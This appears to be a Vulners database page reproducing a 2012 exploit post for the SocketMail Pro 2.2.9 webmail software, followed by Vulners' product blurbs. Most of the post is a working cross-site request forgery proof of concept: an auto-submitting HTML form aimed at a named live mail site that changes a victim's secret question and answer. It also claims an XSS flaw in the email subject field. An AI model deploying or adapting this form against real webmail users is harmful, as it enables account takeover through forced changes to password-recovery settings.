Vulners
Lucene search
SocketMail Pro 2.2.9 Cross Site Request Forgery / Cross Site Scripting
`
#Title:SocketMail Pro version 2.2.9 CSRF (Cross Site Request Forgery) && XSS (Cross Site Scripting)
#Author:MetaiZm
#Software:SocketMail Pro version 2.2.9
#Website:http://socketmail.com/
#Tested on:Windows XP SP3
# Description :
Subject xss codes inject and email send
-> Screen : http://s019.radikal.ru/i627/1204/e2/0ce8a6b54b52.jpg (XSS) # Author:B0T_25
Cross Site Request Forgery Change to Secret question <-
# PoC: http://pastebin.com/diSCcMXM (CSRF)
<form action="http://mail.hayastan.am/home/secretqtn.php" method=post name="signup">
<input type=hidden name='action' value='upd'>
<input type=text name="user_secret_qtn" size="30" maxlength="50" value="hayastan?">
<input type=text name="user_secret_answer" size="30" maxlength="50" value="sikdimseni">
<input type="submit" value="gonder"/>
</form>
<script language="javascript">
document.forms[0].submit()
</script>
Dipnot: böyrəy sözüm yoxdur! ^_^
Test site:mail.hayastan.am
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
23 Apr 2012 00:00Current
0.1Low risk
Vulners AI Score0.1